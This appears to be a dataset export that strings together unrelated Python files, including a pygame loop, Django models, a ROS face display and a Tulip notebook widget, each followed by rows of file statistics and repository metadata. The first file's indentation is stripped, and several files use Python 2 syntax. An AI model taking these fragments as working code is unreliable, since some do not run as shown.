from pygame.locals import QUIT, KEYDOWN, K_q, K_ESCAPE, K_BACKQUOTE, MOUSEBUTTONDOWN
from resources.resourcemgr import ResourceMgr
from scenes.game_scene import GameScene
def main():
pygame.init()
SCREEN_SIZE = (1280, 800)
surface = pygame.display.set_mode(SCREEN_SIZE, 0, 32)
clock = pygame.time.Clock()
active_scene = GameScene(ResourceMgr())
active_scene.generate_game()
while True:
for event in pygame.event.get():
if event.type == QUIT:
return
if event.type == KEYDOWN:
if event.key == K_q or event.key == K_ESCAPE:
return
if event.key == K_BACKQUOTE:
active_scene.handle_tilde_key_down()
if event.type == MOUSEBUTTONDOWN:
if event.button == 1:
active_scene.handle_mouse_left_down(pygame.mouse.get_pos())
if event.button == 3:
active_scene.handle_mouse_right_down(pygame.mouse.get_pos())
time_passed = clock.tick(30)
active_scene.tick(time_passed)
active_scene.draw(surface)
pygame.display.update()
main() | 29.243902 | 84 | 0.608007 | 144 | 1,199 | 4.847222 | 0.416667 | 0.110315 | 0.047278 | 0.031519 | 0.060172 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016726 | 0.301918 | 1,199 | 41 | 85 | 29.243902 | 0.817204 | 0 | 0 | 0.066667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0.066667 | 0.133333 | 0 | 0.233333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
6e066ab1df692bc8b908f58486fc5b072fb3df64 | 1,500 | py | Python | events/migrations/0014_tournament.py | RyanRMurray/warwick_gg | 3d9904c3afc706620ac2a98736dafa7e655765d2 | [
"MIT"
] | 5 | 2018-03-08T13:02:07.000Z | 2020-04-09T13:36:20.000Z | events/migrations/0014_tournament.py | RyanRMurray/warwick_gg | 3d9904c3afc706620ac2a98736dafa7e655765d2 | [
"MIT"
] | 15 | 2018-05-29T13:22:40.000Z | 2022-03-11T23:20:32.000Z | events/migrations/0014_tournament.py | RyanRMurray/warwick_gg | 3d9904c3afc706620ac2a98736dafa7e655765d2 | [
"MIT"
] | 7 | 2018-05-26T15:15:43.000Z | 2020-01-04T20:24:33.000Z | # Generated by Django 2.0.2 on 2018-06-07 13:25
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('events', '0013_eventsignup_unsigned_up_at'),
]
operations = [
migrations.CreateModel(
name='Tournament',
fields=[
('id', models.IntegerField(primary_key=True, serialize=False)),
('title', models.CharField(max_length=100)),
('description', models.TextField(blank=True, help_text='<a href="http://daringfireball.net/projects/markdown/syntax" target="_blank">Markdown syntax</a> allowed, but no raw HTML. Examples: **bold**, *italic*, indent 4 spaces for a code block.')),
('start', models.DateTimeField(default=django.utils.timezone.now)),
('end', models.DateTimeField(default=django.utils.timezone.now)),
('signup_form', models.URLField()),
('signup_start', models.DateTimeField(default=django.utils.timezone.now)),
('signup_end', models.DateTimeField(default=django.utils.timezone.now)),
('requires_attendance', models.BooleanField(default=False)),
('slug', models.SlugField(max_length=40, unique=True)),
('for_event', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='events.Event')),
],
),
]
| 46.875 | 262 | 0.632 | 163 | 1,500 | 5.723926 | 0.576687 | 0.05895 | 0.101822 | 0.137192 | 0.235799 | 0.235799 | 0.235799 | 0.235799 | 0 | 0 | 0 | 0.021496 | 0.224667 | 1,500 | 31 | 263 | 48.387097 | 0.780739 | 0.03 | 0 | 0 | 1 | 0.04 | 0.231246 | 0.037853 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.12 | 0 | 0.24 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e29068ed65ac299fd2f3be4dbe36b67f90ed76a | 777 | py | Python | Python/Exercícios_Python/036_analisando_triângulo.py | vdonoladev/aprendendo-programacao | 83abbcd6701b2105903b28fd549738863418cfb8 | [
"MIT"
] | null | null | null | Python/Exercícios_Python/036_analisando_triângulo.py | vdonoladev/aprendendo-programacao | 83abbcd6701b2105903b28fd549738863418cfb8 | [
"MIT"
] | null | null | null | Python/Exercícios_Python/036_analisando_triângulo.py | vdonoladev/aprendendo-programacao | 83abbcd6701b2105903b28fd549738863418cfb8 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""036 - Analisando Triângulo
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1oQmCX-HLeaqxWxaz9zsjj-5Na35XtNXM
"""
print('*' * 54)
print('------- Condição de existência de um triângulo -------'.upper())
print('*' * 54)
r1 = float(input('Informe o comprimento da 1ª reta: '))
r2 = float(input('Informe o comprimento da 2ª reta: '))
r3 = float(input('Informe o comprimento da 3ª reta: '))
sit_1 = ((r2 - r3) < r1 < (r2 + r3))
sit_2 = ((r1 - r3) < r2 < (r1 + r3))
sit_3 = ((r1 - r2) < r3 < (r1 + r2))
if (sit_1 and sit_2 and sit_3):
print('PARABÉNS! É possível formar um triângulo com essas retas!')
else:
print('DESCULPA. Não é possível formar um triângulo com essas retas.') | 31.08 | 77 | 0.65251 | 115 | 777 | 4.356522 | 0.513043 | 0.065868 | 0.101796 | 0.107784 | 0.341317 | 0.341317 | 0.155689 | 0.155689 | 0 | 0 | 0 | 0.0625 | 0.176319 | 777 | 25 | 78 | 31.08 | 0.720313 | 0.254826 | 0 | 0.153846 | 1 | 0 | 0.481675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.384615 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e30ca22ea1f8382b671a9a4f2cdc4c1c05f4025 | 2,032 | py | Python | scripts/display.py | priyablue/ros-face-recognition | 210ef17b922224007746336c31139be5945712a3 | [
"MIT"
] | 19 | 2018-11-21T07:32:00.000Z | 2022-01-31T13:01:14.000Z | scripts/display.py | bryandario8/ros_face_recognition | 6c7e0bb51d0fa303d88c4512a36264b639396a23 | [
"MIT"
] | 3 | 2019-08-09T15:57:22.000Z | 2019-08-18T05:13:39.000Z | scripts/display.py | bryandario8/ros_face_recognition | 6c7e0bb51d0fa303d88c4512a36264b639396a23 | [
"MIT"
] | 10 | 2019-01-22T05:04:36.000Z | 2022-03-28T01:39:18.000Z | #!/usr/bin/env python
import cv2
import dlib
import rospy
from sensor_msgs.msg import Image
from cv_bridge import CvBridge, CvBridgeError
from ros_face_recognition.srv import Face
import config
import face_api
_service = "/{}/faces".format(config.topic_name)
class ImageReader:
def __init__(self):
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("/camera/rgb/image_raw", Image, self.process)
def process(self, data):
try:
image = self.bridge.imgmsg_to_cv2(data, "bgr8")
image_h, image_w = image.shape[:2]
rospy.wait_for_service(_service)
try:
faces = rospy.ServiceProxy(_service, Face)
resp1 = faces()
faces = resp1.faces
for f in faces:
rect = dlib.rectangle(
int(f.x * image_w),
int(f.y * image_h),
int((f.x + f.w) * image_w),
int((f.y + f.h) * image_h),
)
face = face_api.Face(rect)
face.details["id"] = f.label
face.details["name"] = f.name
face.details["gender"] = f.gender
face.draw_face(image)
except rospy.ServiceException, e:
print "Service call failed: %s" % e
cv2.imshow("image", image)
key = cv2.waitKey(1) & 0xFF
if key == ord('q'):
cv2.destroyAllWindows()
rospy.signal_shutdown("q key pressed")
elif key == ord('s'):
cv2.imwrite("output.jpg", image)
except CvBridgeError as e:
rospy.logerr(e)
def main():
rospy.init_node(config.topic_name, anonymous=True)
rospy.loginfo("Listening to images reader")
ImageReader()
try:
rospy.spin()
except KeyboardInterrupt:
rospy.logwarn("Shutting done ...")
if __name__ == "__main__":
main()
| 27.835616 | 87 | 0.527559 | 228 | 2,032 | 4.535088 | 0.447368 | 0.015474 | 0.029014 | 0.019342 | 0.021277 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009274 | 0.363189 | 2,032 | 72 | 88 | 28.222222 | 0.789799 | 0.009843 | 0 | 0.054545 | 0 | 0 | 0.07459 | 0.010443 | 0 | 0 | 0.001989 | 0 | 0 | 0 | null | null | 0 | 0.145455 | null | null | 0.018182 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e37681d4257d4b4eb5267582f4c47d37524d490 | 1,485 | py | Python | waymo_kitti_converter/tools/list_generator.py | anhvth/Pseudo_Lidar_V2 | d7a29ffc811e315df25bba2a43acf288d4ceb30e | [
"MIT"
] | null | null | null | waymo_kitti_converter/tools/list_generator.py | anhvth/Pseudo_Lidar_V2 | d7a29ffc811e315df25bba2a43acf288d4ceb30e | [
"MIT"
] | null | null | null | waymo_kitti_converter/tools/list_generator.py | anhvth/Pseudo_Lidar_V2 | d7a29ffc811e315df25bba2a43acf288d4ceb30e | [
"MIT"
] | null | null | null | """
This script generates number list text files
Number list contains stem of filenames
Number list specifies the files used for a certain data split
Prefix:
- training: 0 (training/)
- validation: 1 (training/)
- testing: 2 (testing/)
- domain adaptation training labelled: 4 (training/)
- domain adaptation training unlabelled: 5
- domain adaptation validation labelled: 6 (training/)
- domain adaptation validation unlabelled: 7
- domain adaptation testing: 8
"""
import glob
path = '/mnt/lustre/share/DSK/datasets/waymo_open_dataset_kitti/training/label_all'
save_pathname = 'val.txt'
prefixes = []
skip_empty = True # set false for testing set
num_files = 100 # set None to take all
def main():
filenames = []
for prefix in prefixes:
filenames.extend(sorted(glob.glob(path + '/' + prefix + '*.txt')))
if num_files is not None:
filenames = filenames[:num_files]
num_list = []
for filename in filenames:
# skip empty files
if skip_empty:
with open(filename, 'r') as ff:
lines = ff.readlines()
if not lines: # empty
print('Skipping', filename)
continue
num = filename.split('/')[-1][:-4]
num_list.append(num)
with open(save_pathname, 'w') as ot:
for num in num_list:
ot.write(num + '\n')
if __name__ == '__main__':
main()
| 28.018868 | 83 | 0.606061 | 179 | 1,485 | 4.905028 | 0.49162 | 0.091116 | 0.05467 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012369 | 0.292256 | 1,485 | 52 | 84 | 28.557692 | 0.823026 | 0.378451 | 0 | 0 | 1 | 0 | 0.125 | 0.085648 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.037037 | 0 | 0.074074 | 0.037037 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e38cda93aff0cc16c31c54aff63a14fcefb016a | 361 | py | Python | examples/default/app.py | lucuma/authcode | 91529b6d0caec07d1452758d937e1e0745826139 | [
"MIT"
] | 11 | 2015-01-14T17:12:46.000Z | 2015-11-04T12:41:19.000Z | examples/default/app.py | lucuma/authcode | 91529b6d0caec07d1452758d937e1e0745826139 | [
"MIT"
] | null | null | null | examples/default/app.py | lucuma/authcode | 91529b6d0caec07d1452758d937e1e0745826139 | [
"MIT"
] | 1 | 2016-01-12T14:55:15.000Z | 2016-01-12T14:55:15.000Z | # coding=utf-8
from flask import Flask
from mailshake import ToConsoleMailer, SMTPMailer
from sqlalchemy_wrapper import SQLAlchemy
import settings
app = Flask(__name__)
app.config.from_object(settings)
db = SQLAlchemy(settings.SQLALCHEMY_URI, app)
if settings.DEBUG:
mailer = ToConsoleMailer()
else:
mailer = SMTPMailer(**settings.MAILER_SETTINGS)
| 20.055556 | 51 | 0.792244 | 44 | 361 | 6.318182 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003185 | 0.130194 | 361 | 17 | 52 | 21.235294 | 0.882166 | 0.033241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
6e39a3d3b1cd22ab2fba0bba8142913db2f974de | 3,872 | py | Python | VTiger_KPI_Dashboard/docs/models.py | roovyshapiro/VTiger_Sales_Dashboard | c20687ed8cd5aea8df6a6868b94389eb3b069d3a | [
"MIT"
] | null | null | null | VTiger_KPI_Dashboard/docs/models.py | roovyshapiro/VTiger_Sales_Dashboard | c20687ed8cd5aea8df6a6868b94389eb3b069d3a | [
"MIT"
] | null | null | null | VTiger_KPI_Dashboard/docs/models.py | roovyshapiro/VTiger_Sales_Dashboard | c20687ed8cd5aea8df6a6868b94389eb3b069d3a | [
"MIT"
] | null | null | null | from django.db import close_old_connections, models
from django.utils import timezone
class Docs(models.Model):
'''
DOC Example
{
"archivedAt": null,
"collaboratorIds": [
"12345-1234-1234-1234-123456789",
"12345asdf-1234-1234f-1234a-12345a",
],
"collectionId": "797asd6-4568-44560-8456-44asdfe0f",
"createdAt": "2022-04-13T18:32:17.279Z",
"createdBy": {
"avatarUrl": "https://outline-production-attachments.s3-accelerate.amazonaws.com/avatars/234234-7fcd-23423-b1d0-234234/234234-3432-343-2342-234234g",
"color": "#F5BE31",
"createdAt": "2022-03-29T14:40:49.231Z",
"id": "234234-7fcd-2342f-b1d0-2342342fg",
"isAdmin": true,
"isSuspended": false,
"isViewer": false,
"lastActiveAt": "2022-04-29T15:03:39.115Z",
"name": "Roovy Shapiro",
"updatedAt": "2022-04-29T15:03:39.115Z"
},
"deletedAt": null,
"fullWidth": false,
"id": "234234-ae0e-abcd-abc3-234234fgfg",
"lastViewedAt": "2022-04-13T19:35:44.370Z",
"parentDocumentId": "112456-abcd-abcd-abcd-12345678",
"publishedAt": "2022-04-13T18:32:52.768Z",
"revision": 3,
"tasks": {
"completed": 0,
"total": 0
},
"teamId": "c12345-1234-1234-5432-abcdef1234",
"template": false,
"templateId": null,
"text": "https://github.com/roovyshapiro/VTiger_KPI_Dashboard",
"title": "Title",
"updatedAt": "2022-04-13T18:33:00.885Z",
"updatedBy": {
"avatarUrl": "https://outline-production-attachments.s3-accelerate.amazonaws.com/avatars/123123-1234-1234-1234-123123123/123456-1234-1234-1234-abcdef1234",
"color": "#F5BE31",
"createdAt": "2022-03-29T14:40:49.231Z",
"id": "12345asdf-1234-1234f-1234a-12345a",
"isAdmin": true,
"isSuspended": false,
"isViewer": false,
"lastActiveAt": "2022-04-29T15:03:39.115Z",
"name": "Roovy Shapiro",
"updatedAt": "2022-04-29T15:03:39.115Z"
},
"url": "/doc/Title-1234567abcedf",
"urlId": "1234567abcedf"
},
'''
doc_id = models.CharField(max_length=50, null=True,blank=True)
parent_doc_id = models.CharField(max_length=50, null=True,blank=True)
collection_id = models.CharField(max_length=50, null=True,blank=True)
doc_url = models.CharField(max_length=50, null=True,blank=True)
doc_url_id = models.CharField(max_length=50, null=True,blank=True)
team_id = models.CharField(max_length=50, null=True,blank=True)
published_at = models.DateTimeField(null=True,blank=True)
doc_title = models.CharField(max_length=75, null=True,blank=True)
doc_text = models.TextField(null=True,blank=True)
revision = models.IntegerField(null=True,blank=True)
updated_at = models.DateTimeField(null=True,blank=True)
updated_by_name = models.CharField(max_length=50, null=True,blank=True)
updated_by_id = models.CharField(max_length=50, null=True,blank=True)
updated_by_last_active_at = models.DateTimeField(null=True,blank=True)
created_at = models.DateTimeField(null=True,blank=True)
created_by_name = models.CharField(max_length=50, null=True,blank=True)
created_by_id = models.CharField(max_length=50, null=True,blank=True)
created_by_last_active_at = models.DateTimeField(null=True,blank=True)
collaborator_ids = models.TextField(null=True,blank=True)
date_created = models.DateTimeField(auto_now_add=True)
date_modified = models.DateTimeField(auto_now=True)
def __str__(self):
return f'{self.doc_title} - {self.doc_url} - {self.updated_by_name} - {self.updated_at.strftime("%Y-%m-%d %H:%M:%S")}' | 43.505618 | 167 | 0.634298 | 469 | 3,872 | 5.110874 | 0.347548 | 0.063413 | 0.103045 | 0.134752 | 0.570713 | 0.526909 | 0.497288 | 0.465582 | 0.443888 | 0.443888 | 0 | 0.153796 | 0.214101 | 3,872 | 89 | 168 | 43.505618 | 0.633914 | 0.506715 | 0 | 0 | 0 | 0.038462 | 0.064019 | 0.033788 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.076923 | 0.038462 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e3c6c2795d6c10cf76f6c2c5c5d805bbbee3c7f | 690 | py | Python | athanor_channels/commands/character.py | volundmush/athanor_channels | 78d9fb7e2432976e4ec7ef54f18f350bf9b96afd | [
"BSD-3-Clause"
] | null | null | null | athanor_channels/commands/character.py | volundmush/athanor_channels | 78d9fb7e2432976e4ec7ef54f18f350bf9b96afd | [
"BSD-3-Clause"
] | null | null | null | athanor_channels/commands/character.py | volundmush/athanor_channels | 78d9fb7e2432976e4ec7ef54f18f350bf9b96afd | [
"BSD-3-Clause"
] | null | null | null | from athanor_channels.commands.base import AbstractChannelAdminCommand, AbstractChannelCommand, AbstractChannelUseCommand
class CharacterChannelCommand(AbstractChannelCommand):
system_key = 'character'
help_category = "Character Channel Aliases"
user_controller = 'character'
class CmdCharacterChannelAdmin(AbstractChannelAdminCommand):
account_caller = False
system_key = 'object'
key = '@chanadm'
def user_parse(self, user):
system = self.controllers.get('character')
return system.find_character(user)
class CmdCharacterChannelUse(AbstractChannelUseCommand):
account_caller = False
system_key = 'character'
key = '@channel'
| 28.75 | 121 | 0.762319 | 60 | 690 | 8.6 | 0.566667 | 0.052326 | 0.069767 | 0.093023 | 0.104651 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.162319 | 690 | 23 | 122 | 30 | 0.892734 | 0 | 0 | 0.25 | 0 | 0 | 0.12029 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.0625 | 0 | 0.9375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
6e3d67388b1fb9c8f386cf40046f0a6da9ecb35e | 1,101 | py | Python | keras/datasets/sin.py | Dlyma/keras-plus | 47793d9af6102a518fb3ce7d68774cfff055e1d5 | [
"MIT"
] | 1 | 2015-08-27T10:24:25.000Z | 2015-08-27T10:24:25.000Z | keras/datasets/sin.py | Dlyma/keras-plus | 47793d9af6102a518fb3ce7d68774cfff055e1d5 | [
"MIT"
] | null | null | null | keras/datasets/sin.py | Dlyma/keras-plus | 47793d9af6102a518fb3ce7d68774cfff055e1d5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
import cPickle
import sys, os
import numpy as np
# written by zhaowuxia @ 2015/5/30
# used for generate linear datasets
def generate_data(sz, T, diff_start, diff_T):
data = []
for i in range(sz):
start = 0
if diff_start:
start = np.random.random()
Time = 2*np.pi
times_of_loops = 5
if diff_T:
times_of_loops = np.random.randint(10) + 1
data.append(np.sin((np.array(range(T+1)).astype(float)/T + start)*Time*times_of_loops) + np.random.random()/T)
data = np.array(data).reshape(sz, T+1, 1)
X = data[:, :T]
Y = data[:, -1]
return (X, Y)
def load_data(sz, T, path="sin.pkl", diff_start = False, diff_T = False):
data = []
if not os.path.exists(path):
print(path, 'not exists')
data = generate_data(sz, T, diff_start, diff_T)
cPickle.dump(data, open(path, 'wb'))
else:
print(path, 'exists')
data = cPickle.load(open(path, 'rb'))
assert(data[0].shape[0] == sz)
assert(data[0].shape[1] == T)
return data #(X, Y)
| 29.756757 | 118 | 0.572207 | 171 | 1,101 | 3.584795 | 0.380117 | 0.019576 | 0.034258 | 0.04894 | 0.159869 | 0.094617 | 0.094617 | 0.094617 | 0 | 0 | 0 | 0.027329 | 0.268847 | 1,101 | 36 | 119 | 30.583333 | 0.734161 | 0.085377 | 0 | 0.066667 | 1 | 0 | 0.026946 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 1 | 0.066667 | false | 0 | 0.1 | 0 | 0.233333 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e4194bd543d0d5f156af5693d121c8c22edb424 | 909 | py | Python | 4_review_to_tag.py | carpedm20/movietag | cad4f4685e42fbb279371bc7a41b02f1641278df | [
"MIT"
] | 7 | 2015-05-14T15:21:14.000Z | 2021-02-09T00:49:27.000Z | 4_review_to_tag.py | carpedm20/movietag | cad4f4685e42fbb279371bc7a41b02f1641278df | [
"MIT"
] | null | null | null | 4_review_to_tag.py | carpedm20/movietag | cad4f4685e42fbb279371bc7a41b02f1641278df | [
"MIT"
] | 4 | 2015-02-19T17:42:31.000Z | 2019-02-21T15:29:31.000Z | #!/usr/bin/python
import requests
import json
import sys
from os import listdir
from config import *
from random import shuffle
from func import *
debug = True
f = open('movie_review.json', 'r')
j = json.loads(f.read())
f.close()
movie_dict = {}
movie_dict['data'] = []
count = 0
for i in j['data']:
print count
count += 1
new_j = {}
info = i['info']
reviews = i['reviews']
print len(reviews)
new_j['info'] = info
word_list = get_filtered_list(reviews, is_list=True)
word_dict = {}
for w in word_list:
try:
word_dict[w] += 1
except:
word_dict[w] = 1
word_list = [{'text': i, 'freq': word_dict[i]} for i in word_dict]
word_list = sorted(word_list, key=lambda k: k['freq'])
new_j['tags'] = word_list
movie_dict['data'].append(new_j)
f = open('movie_tag.json','w')
json.dump(movie_dict, f)
f.close()
| 16.833333 | 70 | 0.606161 | 142 | 909 | 3.711268 | 0.394366 | 0.091082 | 0.037951 | 0.037951 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005831 | 0.245325 | 909 | 53 | 71 | 17.150943 | 0.762391 | 0.017602 | 0 | 0.055556 | 0 | 0 | 0.085202 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.194444 | null | null | 0.055556 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
6e43805a86b056d39a9529d600d31eb9725d1b98 | 9,122 | py | Python | tulipnb/__init__.py | anlambert/tulip_python_jupyter | 75aad4828b6da72ca4ef971b075bb47eb63bd62e | [
"MIT"
] | null | null | null | tulipnb/__init__.py | anlambert/tulip_python_jupyter | 75aad4828b6da72ca4ef971b075bb47eb63bd62e | [
"MIT"
] | null | null | null | tulipnb/__init__.py | anlambert/tulip_python_jupyter | 75aad4828b6da72ca4ef971b075bb47eb63bd62e | [
"MIT"
] | null | null | null | # Python module to use when working with the tulip module in a Jupyter / IPython notebook
# It enables to inline Tulip WebGL graph visualizations in the notebook
# That code is freely inspired from the great mpld3 project
# (see https://github.com/mpld3/mpld3/tree/master/mpld3)
import sys
import base64
import jinja2
import random
import os.path
import tempfile
import shutil
import IPython
from IPython.core.getipython import get_ipython
from IPython.core.display import display as ipythondisplay
from tulip import tlp
TULIPJS_HTML = jinja2.Template("""
<style type="text/css">
.tulip_viz {
height: 400px;
border: 1px solid black;
}
.interactor_button {
position: absolute;
left: 5px !important;
z-index: 10;
}
.center_button {
position: absolute;
right: 0px !important;
top: 0px !important;
z-index: 10;
}
.fullscreen_button {
position: absolute;
right: 0px !important;
top: 45px !important;
z-index: 10;
}
</style>
<link rel="stylesheet" href=""/>
<div id="toolbar-options{{ vizid }}" class="hidden">
<a class="interactor-znp" href="#"><i class="fa fa-hand-paper-o" aria-hidden="true"></i></a>
<a class="interactor-zoom" href="#"><i class="fa fa-search-plus"></i></a>
<a class="interactor-fisheye" href="#"><i class="fa fa-eye"></i></a>
<a class="interactor-neighborhood" href="#"><i class="fa fa-share-alt"></i></a>
</div>
<div id="{{ vizid }}" class="tulip_viz">
<div id="toolbar{{ vizid }}" class="btn-toolbar btn-toolbar-dark interactor_button hidden">
<i class="fa fa-hand-paper-o" aria-hidden="true"></i>
</div>
<div id="center{{ vizid }}" class="btn-toolbar btn-toolbar-dark center_button hidden">
<i class="fa fa-arrows" aria-hidden="true"></i>
</div>
<div id="fullscreen{{ vizid }}" class="btn-toolbar btn-toolbar-dark fullscreen_button hidden">
<i class="fa fa-arrows-alt" aria-hidden="true"></i>
</div>
</div>
<script type="text/javascript">
var hostname = window.location.hostname;
var scriptPaths;
// case where we are running a local notebook server, load required assets from it
if (hostname == "localhost" || hostname == "127.0.0.1") {
scriptPaths = {tulip: "{{ tulipjs_url[:-3] }}",
base64utils: "{{ base64utils_url[:-3] }}",
jquerytoolbar: "{{ jquerytoolbarjs_url[:-3] }}"};
if ($("#jqtoolbarcss").length == 0) {
$("head").append('<link id="jqtoolbarcss" rel="stylesheet" href="{{ jquerytoolbarcss_url }}" type="text/css" />');
}
if ($("#fontawesomecss").length == 0) {
$("head").append('<link id="fontawesomecss" rel="stylesheet" href="{{ fontawesomecss_url }}" type="text/css" />');
}
// otherwise, we assume that we are only rendering a static html notebook through nbviewer
// so load required assets from rawgit (GitHub CDN)
} else {
var cdnPrefix = "https://rawgit.com/anlambert/tulip_python_notebook/master/tulipnb/tulipjs/";
scriptPaths = {tulip: cdnPrefix + "tulip",
base64utils: cdnPrefix + "base64utils",
jquerytoolbar: cdnPrefix + "jquery.toolbar.min"};
if ($("#jqtoolbarcss").length == 0) {
$("head").append('<link id="jqtoolbarcss" rel="stylesheet" href="'+ cdnPrefix + 'css/jquery.toolbar.css" type="text/css" />');
}
if ($("#fontawesomecss").length == 0) {
$("head").append('<link id="fontawesomecss" rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css" type="text/css" />');
}
window.tulipConf = {
modulePrefixURL: cdnPrefix,
filePackagePrefixURL: cdnPrefix,
memoryInitializerPrefixURL: cdnPrefix
};
}
require.config({waitSeconds: 0,
paths: scriptPaths});
require(["tulip", "base64utils", "jquerytoolbar"], function(tulip, base64utils) {
var tulipView = null;
function resizeTulipView() {
if (tulipView && tulipView.fullScreenActivated) return;
if (tulipView) {
tulipView.resize();
}
}
window.addEventListener('resize', resizeTulipView, false);
$("#toolbar-options{{ vizid }}").find(".interactor-znp").on('click', function() {
tulipView.activateInteractor('ZoomAndPan');
});
$("#toolbar-options{{ vizid }}").find(".interactor-zoom").on('click', function() {
tulipView.activateInteractor('RectangleZoom');
});
$("#toolbar-options{{ vizid }}").find(".interactor-neighborhood").on('click', function() {
tulipView.activateInteractor('Neighborhood');
});
$("#center{{ vizid }}").on('click', function() {
tulipView.centerScene();
});
$("#fullscreen{{ vizid }}").on('click', function() {
tulipView.fullScreen();
});
$("#toolbar-options{{ vizid }}").find(".interactor-fisheye").on('click', function() {
tulipView.activateInteractor('Fisheye');
});
$("#toolbar-options{{ vizid }}").find('a').on('click', function() {
$this = $(this);
$button = $('#toolbar{{ vizid }}');
$newClass = $this.find('i').attr('class').substring(3);
$oldClass = $button.find('i').attr('class').substring(3);
if($newClass != $oldClass) {
$button.find('i').animate({
top: "+=50",
opacity: 0
}, 200, function() {
$(this).removeClass($oldClass).addClass($newClass).css({top: "-=100", opacity: 1}).animate({
top: "+=50"
});
});
}
});
$('#toolbar{{ vizid }}').toolbar({
content: '#toolbar-options{{ vizid }}',
position: 'bottom',
style: 'dark',
event: 'click',
hideOnClick: true
});
tulip.init().then(function() {
var tlpbgzGraphBase64 = "{{ tlpbgz_graph_base64 }}";
var tlpbgzGraphBinary = base64utils.base64DecToArr(tlpbgzGraphBase64);
var container = document.getElementById("{{ vizid }}");
tulipView = tulip.View(container);
$("#toolbar{{ vizid }}").removeClass('hidden');
$("#center{{ vizid }}").removeClass('hidden');
$("#fullscreen{{ vizid }}").removeClass('hidden');
tulipView.loadGraphFromData("graph.tlpb.gz", tlpbgzGraphBinary);
tulipView.centerScene();
tulipView.draw();
